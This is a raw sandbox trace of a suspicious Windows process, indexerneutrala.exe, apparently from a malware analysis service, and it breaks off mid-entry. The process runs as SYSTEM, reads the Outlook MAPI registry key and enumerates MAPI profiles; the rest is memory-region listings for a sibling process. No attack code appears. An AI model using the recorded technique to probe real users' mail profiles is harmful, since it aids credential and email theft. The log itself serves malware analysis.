(dwErrCode=0x0) [0252.253] GetLastError () returned 0x0 [0252.253] SetLastError (dwErrCode=0x0) [0252.253] GetLastError () returned 0x0 [0252.253] SetLastError (dwErrCode=0x0) [0252.253] GetLastError () returned 0x0 [0252.253] SetLastError (dwErrCode=0x0) [0252.253] GetLastError () returned 0x0 [0252.253] SetLastError (dwErrCode=0x0) [0252.253] GetLastError () returned 0x0 [0252.253] SetLastError (dwErrCode=0x0) [0252.253] GetLastError () returned 0x0 [0252.253] SetLastError (dwErrCode=0x0) [0252.253] GetLastError () returned 0x0 [0252.253] SetLastError (dwErrCode=0x0) [0252.253] GetLastError () returned 0x0 [0252.253] SetLastError (dwErrCode=0x0) [0252.253] GetLastError () returned 0x0 [0252.253] SetLastError (dwErrCode=0x0) [0252.253] GetLastError () returned 0x0 [0252.253] SetLastError (dwErrCode=0x0) [0252.253] GetLastError () returned 0x0 [0252.253] SetLastError (dwErrCode=0x0) [0252.253] GetLastError () returned 0x0 [0252.253] SetLastError (dwErrCode=0x0) [0252.253] GetLastError () returned 0x0 [0252.253] SetLastError (dwErrCode=0x0) [0252.253] GetLastError () returned 0x0 [0252.253] SetLastError (dwErrCode=0x0) [0252.253] GetLastError () returned 0x0 [0252.253] SetLastError (dwErrCode=0x0) [0252.253] GetLastError () returned 0x0 [0252.254] SetLastError (dwErrCode=0x0) [0252.254] GetLastError () returned 0x0 [0252.254] SetLastError (dwErrCode=0x0) [0252.254] GetLastError () returned 0x0 [0252.254] SetLastError (dwErrCode=0x0) [0252.254] GetLastError () returned 0x0 [0252.254] SetLastError (dwErrCode=0x0) [0252.254] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x7fff9c8f0000 [0252.255] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x7fff9e040000 [0252.269] LoadLibraryW (lpLibFileName="api-ms-win-core-com-l1-1-0.DLL") returned 0x7fff9e580000 [0252.270] GetCommandLineW () returned="\"C:\\Windows\\SysWOW64\\indexerneutrala.exe\" \"C:\\Windows\\TEMP\\3595.tmp\"" [0252.270] CommandLineToArgvW (in: lpCmdLine="\"C:\\Windows\\SysWOW64\\indexerneutrala.exe\" \"C:\\Windows\\TEMP\\3595.tmp\"", pNumArgs=0xb1fd92f700 | out: pNumArgs=0xb1fd92f700) returned 0xb1fd972090*="C:\\Windows\\SysWOW64\\indexerneutrala.exe" [0252.270] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Clients\\Mail\\Microsoft Outlook", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x1, lpSecurityAttributes=0x0, phkResult=0xb1fd92f6f0, lpdwDisposition=0x0 | out: phkResult=0xb1fd92f6f0*=0x128, lpdwDisposition=0x0) returned 0x0 [0252.271] RegQueryValueExW (in: hKey=0x128, lpValueName="DLLPathEx", lpReserved=0x0, lpType=0x0, lpData=0xb1fd92f710, lpcbData=0xb1fd92f6c0*=0x104 | out: lpType=0x0, lpData=0xb1fd92f710*=0x43, lpcbData=0xb1fd92f6c0*=0xc2) returned 0x0 [0252.271] RegCloseKey (hKey=0x128) returned 0x0 [0252.271] LoadLibraryW (lpLibFileName="C:\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\system\\msmapi\\1033\\msmapi32.dll") returned 0x7fff98390000 [0252.700] CreateFileW (lpFileName="C:\\Windows\\TEMP\\3595.tmp" (normalized: "c:\\windows\\temp\\3595.tmp"), dwDesiredAccess=0x4, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0252.701] MAPIInitialize (lpMapiInit=0x0) returned 0x0 [0292.656] MAPIAdminProfiles (in: ulFlags=0x0, lppProfAdmin=0xb1fd92ee58 | out: lppProfAdmin=0xb1fd92ee58) returned 0x0 [0292.658] MAPIFreeBuffer (lpBuffer=0xb1fe579c30) returned 0x0 [0292.658] MAPIUninitialize () [0295.699] CloseHandle (hObject=0x130) returned 1 [0295.699] FreeLibrary (hLibModule=0x7fff98390000) returned 1 [0295.700] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0xb1fd92f8c8 | out: phModule=0xb1fd92f8c8) returned 0 [0295.700] ExitProcess (uExitCode=0x0) Thread: id = 530 os_tid = 0x49c Thread: id = 534 os_tid = 0x754 Thread: id = 536 os_tid = 0x830 Thread: id = 539 os_tid = 0xb2c Thread: id = 540 os_tid = 0x570 Thread: id = 541 os_tid = 0x25c Thread: id = 545 os_tid = 0x540 Thread: id = 546 os_tid = 0x2cc Thread: id = 549 os_tid = 0xb64 Thread: id = 551 os_tid = 0xb20 Thread: id = 553 os_tid = 0xb3c Thread: id = 555 os_tid = 0xb30 Thread: id = 556 os_tid = 0xb1c Thread: id = 582 os_tid = 0xb14 Thread: id = 585 os_tid = 0xc28 Thread: id = 587 os_tid = 0xc30 Process: id = "31" image_name = "indexerneutralb.exe" filename = "c:\\windows\\syswow64\\indexerneutralb.exe" page_root = "0x1f3d5000" os_pid = "0x538" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x6cc" cmd_line = "\"C:\\Windows\\SysWOW64\\indexerneutralb.exe\" \"C:\\Windows\\TEMP\\3267.tmp\"" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 4191 start_va = 0x7f507000 end_va = 0x7f507fff entry_point = 0x0 region_type = private name = "private_0x000000007f507000" filename = "" Region: id = 4192 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4193 start_va = 0xe68af70000 end_va = 0xe68af8ffff entry_point = 0x0 region_type = private name = "private_0x000000e68af70000" filename = "" Region: id = 4194 start_va = 0xe68af90000 end_va = 0xe68afa3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68af90000" filename = "" Region: id = 4195 start_va = 0xe68afb0000 end_va = 0xe68b02ffff entry_point = 0x0 region_type = private name = "private_0x000000e68afb0000" filename = "" Region: id = 4196 start_va = 0xe68b030000 end_va = 0xe68b033fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68b030000" filename = "" Region: id = 4197 start_va = 0xe68b040000 end_va = 0xe68b040fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68b040000" filename = "" Region: id = 4198 start_va = 0xe68b050000 end_va = 0xe68b051fff entry_point = 0x0 region_type = private name = "private_0x000000e68b050000" filename = "" Region: id = 4199 start_va = 0x7df5ff810000 end_va = 0x7ff5ff80ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff810000" filename = "" Region: id = 4200 start_va = 0x7ff6da960000 end_va = 0x7ff6da982fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6da960000" filename = "" Region: id = 4201 start_va = 0x7ff6da985000 end_va = 0x7ff6da985fff entry_point = 0x0 region_type = private name = "private_0x00007ff6da985000" filename = "" Region: id = 4202 start_va = 0x7ff6da98e000 end_va = 0x7ff6da98ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6da98e000" filename = "" Region: id = 4203 start_va = 0x7ff6db2d0000 end_va = 0x7ff6db2ebfff entry_point = 0x7ff6db2d0000 region_type = mapped_file name = "indexerneutralb.exe" filename = "\\Windows\\SysWOW64\\indexerneutralb.exe" (normalized: "c:\\windows\\syswow64\\indexerneutralb.exe") Region: id = 4204 start_va = 0x7fff9f1c0000 end_va = 0x7fff9f381fff entry_point = 0x7fff9f1c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4205 start_va = 0x140000000 end_va = 0x140021fff entry_point = 0x0 region_type = private name = "private_0x0000000140000000" filename = "" Region: id = 4209 start_va = 0xe68b0a0000 end_va = 0xe68b19ffff entry_point = 0x0 region_type = private name = "private_0x000000e68b0a0000" filename = "" Region: id = 4210 start_va = 0x7fff9c6b0000 end_va = 0x7fff9c88cfff entry_point = 0x7fff9c6b0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4211 start_va = 0x7fff9c9a0000 end_va = 0x7fff9ca4cfff entry_point = 0x7fff9c9a0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4246 start_va = 0xe68af70000 end_va = 0xe68af7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68af70000" filename = "" Region: id = 4247 start_va = 0xe68af80000 end_va = 0xe68af86fff entry_point = 0x0 region_type = private name = "private_0x000000e68af80000" filename = "" Region: id = 4248 start_va = 0xe68b060000 end_va = 0xe68b066fff entry_point = 0x0 region_type = private name = "private_0x000000e68b060000" filename = "" Region: id = 4249 start_va = 0xe68b070000 end_va = 0xe68b070fff entry_point = 0x0 region_type = private name = "private_0x000000e68b070000" filename = "" Region: id = 4250 start_va = 0xe68b080000 end_va = 0xe68b080fff entry_point = 0x0 region_type = private name = "private_0x000000e68b080000" filename = "" Region: id = 4251 start_va = 0xe68b1a0000 end_va = 0xe68b25dfff entry_point = 0xe68b1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4252 start_va = 0xe68b260000 end_va = 0xe68b35ffff entry_point = 0x0 region_type = private name = "private_0x000000e68b260000" filename = "" Region: id = 4253 start_va = 0xe68b360000 end_va = 0xe68b41ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68b360000" filename = "" Region: id = 4254 start_va = 0xe68b430000 end_va = 0xe68b43ffff entry_point = 0x0 region_type = private name = "private_0x000000e68b430000" filename = "" Region: id = 4255 start_va = 0xe68b440000 end_va = 0xe68b5c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68b440000" filename = "" Region: id = 4256 start_va = 0xe68b5d0000 end_va = 0xe68b750fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68b5d0000" filename = "" Region: id = 4257 start_va = 0x7ff6da860000 end_va = 0x7ff6da95ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6da860000" filename = "" Region: id = 4258 start_va = 0x7ff6da98c000 end_va = 0x7ff6da98dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6da98c000" filename = "" Region: id = 4259 start_va = 0x7fff9bbf0000 end_va = 0x7fff9bbfefff entry_point = 0x7fff9bbf0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4260 start_va = 0x7fff9bc00000 end_va = 0x7fff9bc12fff entry_point = 0x7fff9bc00000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4261 start_va = 0x7fff9bc40000 end_va = 0x7fff9bc89fff entry_point = 0x7fff9bc40000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4262 start_va = 0x7fff9bc90000 end_va = 0x7fff9c2b7fff entry_point = 0x7fff9bc90000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4263 start_va = 0x7fff9c5a0000 end_va = 0x7fff9c652fff entry_point = 0x7fff9c5a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4264 start_va = 0x7fff9c890000 end_va = 0x7fff9c8e0fff entry_point = 0x7fff9c890000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4265 start_va = 0x7fff9c8f0000 end_va = 0x7fff9c995fff entry_point = 0x7fff9c8f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4266 start_va = 0x7fff9ca50000 end_va = 0x7fff9df74fff entry_point = 0x7fff9ca50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4267 start_va = 0x7fff9e190000 end_va = 0x7fff9e2ddfff entry_point = 0x7fff9e190000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4268 start_va = 0x7fff9e450000 end_va = 0x7fff9e575fff entry_point = 0x7fff9e450000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4269 start_va = 0x7fff9e580000 end_va = 0x7fff9e7fbfff entry_point = 0x7fff9e580000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4270 start_va = 0x7fff9e870000 end_va = 0x7fff9e90cfff entry_point = 0x7fff9e870000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4271 start_va = 0x7fff9ed80000 end_va = 0x7fff9eddafff entry_point = 0x7fff9ed80000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4272 start_va = 0x7fff9ef20000 end_va = 0x7fff9f0a4fff entry_point = 0x7fff9ef20000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4273 start_va = 0x7fff9e040000 end_va = 0x7fff9e180fff entry_point = 0x7fff9e040000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4274 start_va = 0xe68b760000 end_va = 0xe68b81cfff entry_point = 0xe68b760000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4275 start_va = 0x7fff98390000 end_va = 0x7fff983a9fff entry_point = 0x7fff98390000 region_type = mapped_file name = "msmapi32.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\SYSTEM\\MSMAPI\\1033\\MSMAPI32.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\system\\msmapi\\1033\\msmapi32.dll") Region: id = 4282 start_va = 0x73800000 end_va = 0x73814fff entry_point = 0x73800000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\SysWOW64\\vcruntime140.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140.dll") Region: id = 4283 start_va = 0x7fff961a0000 end_va = 0x7fff96291fff entry_point = 0x7fff961a0000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 4284 start_va = 0x7fff98370000 end_va = 0x7fff98385fff entry_point = 0x7fff98370000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 4290 start_va = 0xe68b090000 end_va = 0xe68b090fff entry_point = 0x0 region_type = private name = "private_0x000000e68b090000" filename = "" Region: id = 4291 start_va = 0xe68b420000 end_va = 0xe68b420fff entry_point = 0x0 region_type = private name = "private_0x000000e68b420000" filename = "" Region: id = 4294 start_va = 0x7fff98330000 end_va = 0x7fff98369fff entry_point = 0x7fff98330000 region_type = mapped_file name = "jitv.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\JitV.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\jitv.dll") Region: id = 4298 start_va = 0x7fff5c6d0000 end_va = 0x7fff5c6dffff entry_point = 0x0 region_type = private name = "private_0x00007fff5c6d0000" filename = "" Region: id = 4299 start_va = 0xe68b760000 end_va = 0xe68ba96fff entry_point = 0xe68b760000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4300 start_va = 0x7fff91480000 end_va = 0x7fff91703fff entry_point = 0x7fff91480000 region_type = mapped_file name = "appvisvsubsystems64.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll") Region: id = 4303 start_va = 0xe68baa0000 end_va = 0xe68baa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68baa0000" filename = "" Region: id = 4304 start_va = 0x74160000 end_va = 0x74178fff entry_point = 0x74160000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 4305 start_va = 0x7fff91200000 end_va = 0x7fff91477fff entry_point = 0x7fff91200000 region_type = mapped_file name = "c2r64.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll") Region: id = 4306 start_va = 0x7fff9b1a0000 end_va = 0x7fff9b1befff entry_point = 0x7fff9b1a0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4345 start_va = 0x7fff9ede0000 end_va = 0x7fff9ee9dfff entry_point = 0x7fff9ede0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4350 start_va = 0xe68bab0000 end_va = 0xe68bab2fff entry_point = 0xe68bab0000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4351 start_va = 0xe68bac0000 end_va = 0xe68bac8fff entry_point = 0xe68bac0000 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4352 start_va = 0xe68bab0000 end_va = 0xe68bab2fff entry_point = 0xe68bab0000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4353 start_va = 0xe68bac0000 end_va = 0xe68bac8fff entry_point = 0xe68bac0000 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4354 start_va = 0xe68bab0000 end_va = 0xe68bab0fff entry_point = 0x0 region_type = private name = "private_0x000000e68bab0000" filename = "" Region: id = 4355 start_va = 0xe68bab0000 end_va = 0xe68bab0fff entry_point = 0x0 region_type = private name = "private_0x000000e68bab0000" filename = "" Region: id = 4364 start_va = 0xe68bab0000 end_va = 0xe68bbaffff entry_point = 0x0 region_type = private name = "private_0x000000e68bab0000" filename = "" Region: id = 4365 start_va = 0x7ff6da98a000 end_va = 0x7ff6da98bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6da98a000" filename = "" Region: id = 4367 start_va = 0xe68bbb0000 end_va = 0xe68bbc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68bbb0000" filename = "" Region: id = 4368 start_va = 0x7fff5f240000 end_va = 0x7fff5f24ffff entry_point = 0x0 region_type = private name = "private_0x00007fff5f240000" filename = "" Region: id = 4371 start_va = 0x7fff8f1c0000 end_va = 0x7fff8fa6bfff entry_point = 0x7fff8f1c0000 region_type = mapped_file name = "olmapi32.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\OLMAPI32.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\olmapi32.dll") Region: id = 4373 start_va = 0xe68b260000 end_va = 0xe68b261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68b260000" filename = "" Region: id = 4374 start_va = 0x7fff8fbe0000 end_va = 0x7fff8fd88fff entry_point = 0x7fff8fbe0000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10240.16384_none_89a94c179af51f83\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10240.16384_none_89a94c179af51f83\\gdiplus.dll") Region: id = 4377 start_va = 0x73f20000 end_va = 0x73f2efff entry_point = 0x73f20000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 4378 start_va = 0x7fff9a1b0000 end_va = 0x7fff9a1c2fff entry_point = 0x7fff9a1b0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4381 start_va = 0x73960000 end_va = 0x739adfff entry_point = 0x73960000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\SysWOW64\\wevtapi.dll" (normalized: "c:\\windows\\syswow64\\wevtapi.dll") Region: id = 4382 start_va = 0x7fff98ec0000 end_va = 0x7fff98f24fff entry_point = 0x7fff98ec0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 4385 start_va = 0x73780000 end_va = 0x737f0fff entry_point = 0x73780000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\SystemX86\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\systemx86\\msvcp140.dll") Region: id = 4386 start_va = 0x7fff8f030000 end_va = 0x7fff8f0d6fff entry_point = 0x7fff8f030000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\msvcp140.dll") Region: id = 4389 start_va = 0x73ee0000 end_va = 0x73efafff entry_point = 0x73ee0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4390 start_va = 0x7fff9ba10000 end_va = 0x7fff9ba37fff entry_point = 0x7fff9ba10000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4393 start_va = 0xe68bbb0000 end_va = 0xe68bcaffff entry_point = 0x0 region_type = private name = "private_0x000000e68bbb0000" filename = "" Region: id = 4395 start_va = 0x7fff92c10000 end_va = 0x7fff92e83fff entry_point = 0x7fff92c10000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 4396 start_va = 0xe68b270000 end_va = 0xe68b270fff entry_point = 0xe68b270000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 4397 start_va = 0xe68b280000 end_va = 0xe68b281fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68b280000" filename = "" Region: id = 4398 start_va = 0x7fff92c00000 end_va = 0x7fff92c09fff entry_point = 0x7fff92c00000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4406 start_va = 0xe68b290000 end_va = 0xe68b2dffff entry_point = 0x0 region_type = private name = "private_0x000000e68b290000" filename = "" Region: id = 4407 start_va = 0x745b0000 end_va = 0x74608fff entry_point = 0x745b0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4408 start_va = 0x7fff9ba40000 end_va = 0x7fff9baaafff entry_point = 0x7fff9ba40000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4409 start_va = 0xe68bcb0000 end_va = 0xe68bd85fff entry_point = 0xe68bcb0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4414 start_va = 0x7fff92c00000 end_va = 0x7fff92c09fff entry_point = 0x7fff92c00000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4415 start_va = 0x7fff92c00000 end_va = 0x7fff92c09fff entry_point = 0x7fff92c00000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4416 start_va = 0x7fff92c00000 end_va = 0x7fff92c09fff entry_point = 0x7fff92c00000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4418 start_va = 0x7fff92c00000 end_va = 0x7fff92c09fff entry_point = 0x7fff92c00000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4423 start_va = 0xe68b270000 end_va = 0xe68b272fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68b270000" filename = "" Region: id = 4424 start_va = 0xe68b2e0000 end_va = 0xe68b35ffff entry_point = 0x0 region_type = private name = "private_0x000000e68b2e0000" filename = "" Region: id = 4425 start_va = 0x7ff6da98c000 end_va = 0x7ff6da98dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6da98c000" filename = "" Region: id = 4426 start_va = 0x7fff8c750000 end_va = 0x7fff8cdc8fff entry_point = 0x7fff8c750000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 4432 start_va = 0xe68b290000 end_va = 0xe68b29ffff entry_point = 0x0 region_type = private name = "private_0x000000e68b290000" filename = "" Region: id = 4433 start_va = 0xe68b2a0000 end_va = 0xe68b2a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68b2a0000" filename = "" Region: id = 4434 start_va = 0xe68b2d0000 end_va = 0xe68b2dffff entry_point = 0x0 region_type = private name = "private_0x000000e68b2d0000" filename = "" Region: id = 4435 start_va = 0xe68bd00000 end_va = 0xe68bd1ffff entry_point = 0x0 region_type = private name = "private_0x000000e68bd00000" filename = "" Region: id = 4436 start_va = 0x7fff8b640000 end_va = 0x7fff8be50fff entry_point = 0x7fff8b640000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 4437 start_va = 0xe68b2b0000 end_va = 0xe68b2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68b2b0000" filename = "" Region: id = 4438 start_va = 0x7fff8a760000 end_va = 0x7fff8b55bfff entry_point = 0x7fff8a760000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 4441 start_va = 0x73940000 end_va = 0x7395cfff entry_point = 0x73940000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4442 start_va = 0x7fff99c60000 end_va = 0x7fff99c81fff entry_point = 0x7fff99c60000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 4449 start_va = 0xe68b2c0000 end_va = 0xe68b2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e68b2c0000" filename = "" Region: id = 4450 start_va = 0xe68bcb0000 end_va = 